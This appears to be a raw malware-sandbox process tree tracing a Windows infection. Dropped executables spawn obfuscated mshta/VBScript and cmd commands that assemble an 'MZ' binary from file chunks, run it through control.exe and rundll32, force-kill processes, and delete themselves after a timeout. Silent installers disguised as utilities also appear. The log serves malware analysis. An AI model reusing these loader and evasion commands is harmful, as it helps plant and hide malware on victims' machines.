C:\Users\Admin\AppData\Local\Temp\09xU.exE09xU.EXE -pPtzyIkqLZoCarb5ew4⤵PID:5080
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )5⤵PID:716
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE") do taskkill /F -Im "%~NxU"6⤵PID:4516
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " ,0,TRuE) )5⤵PID:2128
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH +7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I6⤵PID:4944
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHO "7⤵PID:4504
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"7⤵PID:780
-
-
C:\Windows\SysWOW64\control.execontrol .\R6f7sE.I7⤵PID:4540
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I8⤵
- Loads dropped DLL
PID:4508 -
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I9⤵PID:5916
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I10⤵PID:3656
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F -Im "Thu1653d94a8da.exe"4⤵
- Kills process with taskkill
PID:2340
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC84C3DC3\Thu16f3de88a335950bb.exeThu16f3de88a335950bb.exe1⤵
- Executes dropped EXE
PID:3408 -
C:\Users\Admin\AppData\Local\Temp\is-NQOGS.tmp\Thu16f3de88a335950bb.tmp"C:\Users\Admin\AppData\Local\Temp\is-NQOGS.tmp\Thu16f3de88a335950bb.tmp" /SL5="$200B8,1570064,56832,C:\Users\Admin\AppData\Local\Temp\7zSC84C3DC3\Thu16f3de88a335950bb.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4976
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC84C3DC3\Thu16f3de88a335950bb.exe"C:\Users\Admin\AppData\Local\Temp\7zSC84C3DC3\Thu16f3de88a335950bb.exe" /SILENT1⤵PID:1360
-
C:\Users\Admin\AppData\Local\Temp\is-K470I.tmp\Thu16f3de88a335950bb.tmp"C:\Users\Admin\AppData\Local\Temp\is-K470I.tmp\Thu16f3de88a335950bb.tmp" /SL5="$300B8,1570064,56832,C:\Users\Admin\AppData\Local\Temp\7zSC84C3DC3\Thu16f3de88a335950bb.exe" /SILENT2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1488 -
C:\Users\Admin\AppData\Local\Temp\is-H30O0.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-H30O0.tmp\postback.exe" ss13⤵
- Executes dropped EXE
PID:3668
-
-
C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe"C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe" ss13⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2340
-
-
C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe"C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe" /q /norestart3⤵
- Executes dropped EXE
PID:4044 -
C:\4d123062de93133ad650a1e18d30\Setup.exeC:\4d123062de93133ad650a1e18d30\\Setup.exe /q /norestart /x86 /x64 /web4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2156
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:1540
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2288 -ip 22881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1164
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4908 -ip 49081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3548
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3192 -ip 31921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3240
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:1444 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:4348 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4348 -s 4483⤵
- Program crash
PID:564
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4348 -ip 43481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4040
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
PID:2244 -
C:\Windows\uus\AMD64\MoUsoCoreWorker.exeC:\Windows\uus\AMD64\MoUsoCoreWorker.exe2⤵PID:2832
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 4012 -ip 40121⤵PID:5044
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 5848 -ip 58481⤵PID:5360
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 5508 -ip 55081⤵PID:5216
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 5544 -ip 55441⤵PID:5416
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3344 -ip 33441⤵PID:5924
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4928 -ip 49281⤵PID:3692
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:4504
-
C:\Users\Admin\AppData\Local\Temp\3C6D.exeC:\Users\Admin\AppData\Local\Temp\3C6D.exe1⤵PID:1496
-
C:\Users\Admin\AppData\Local\Temp\3C6D.exeC:\Users\Admin\AppData\Local\Temp\3C6D.exe2⤵PID:5132
-
-
C:\Users\Admin\AppData\Local\Temp\47C9.exeC:\Users\Admin\AppData\Local\Temp\47C9.exe1⤵PID:3636
-
C:\Users\Admin\AppData\Local\Temp\47C9.exeC:\Users\Admin\AppData\Local\Temp\47C9.exe2⤵PID:4980
-
-
C:\Users\Admin\AppData\Local\Temp\47C9.exeC:\Users\Admin\AppData\Local\Temp\47C9.exe2⤵PID:5648
-
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe f09cd4e4115abaa1e141ee1a978a44bd clZulJdZrEmnxn7nVWmdrw.0.1.0.3.01⤵PID:2416
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 3940 -ip 39401⤵PID:1556
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 720 -p 5744 -ip 57441⤵PID:4316
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 764 -p 3064 -ip 30641⤵PID:5856
-
C:\Users\Admin\AppData\Local\Temp\79F5.exeC:\Users\Admin\AppData\Local\Temp\79F5.exe1⤵PID:6476
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6476 -s 3042⤵
- Program crash
PID:7044
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 712 -p 6476 -ip 64761⤵PID:6948
-
C:\Users\Admin\AppData\Local\Temp\9E95.exeC:\Users\Admin\AppData\Local\Temp\9E95.exe1⤵PID:7144
-
C:\Users\Admin\AppData\Local\Temp\ACB0.exeC:\Users\Admin\AppData\Local\Temp\ACB0.exe1⤵PID:6492
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6492 -s 3002⤵
- Program crash
PID:6556
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 6492 -ip 64921⤵PID:6528
-
C:\Users\Admin\AppData\Local\Temp\BAAB.exeC:\Users\Admin\AppData\Local\Temp\BAAB.exe1⤵PID:5468
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5468 -s 2682⤵
- Program crash
PID:3624
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 688 -p 5468 -ip 54681⤵PID:2132
-
C:\Users\Admin\AppData\Local\Temp\CE15.exeC:\Users\Admin\AppData\Local\Temp\CE15.exe1⤵PID:5968
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 3002⤵
- Program crash
PID:7056
-
-
C:\Users\Admin\AppData\Local\Temp\D4CC.exeC:\Users\Admin\AppData\Local\Temp\D4CC.exe1⤵PID:6872
-
C:\Users\Admin\AppData\Local\Temp\DD2A.exeC:\Users\Admin\AppData\Local\Temp\DD2A.exe1⤵PID:5904
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\DD2A.exe" & exit2⤵PID:6628
-
C:\Windows\SysWOW64\timeout.exetimeout /t 53⤵
- Delays execution with timeout.exe
PID:3132
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 768 -p 5968 -ip 59681⤵PID:6212
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:6652
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding B787B5AC48F394FC1EBBD9D064BB8750 C2⤵PID:1956
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding E7243A591DF8D92B0233F8A3256DEC5B C2⤵PID:2180
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 7150D58E2752EB639AFA37DF7D7A00A1 C2⤵PID:4840
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding BA23526E45B22598541BF48C849BDB722⤵PID:8060
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator\prerequisites\aipackagechainer.exe"2⤵PID:15628
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator\prerequisites\RequiredApplication_1\Calculator%20Installation.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator\prerequisites\RequiredApplication_1\Calculator%20Installation.exe" -silent=1 -CID=764 -SID=764 -submn=default3⤵PID:15676
-
-
-
C:\Users\Admin\AppData\Local\Temp\16D9.exeC:\Users\Admin\AppData\Local\Temp\16D9.exe1⤵PID:6368
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Geeks3D\Fur Images Converter 3.3.2.0\install\4814FC9\adv.msi" AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\16D9.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1633372098 " AI_EUIMSI=""2⤵PID:1104
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 688 -p 5508 -ip 55081⤵PID:5368
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:904
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵PID:7556
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7556 -s 4482⤵
- Program crash
PID:7692
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:7524
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 7556 -ip 75561⤵PID:7624
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 7896 -ip 78961⤵PID:8884
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:9716
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:10044
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:11180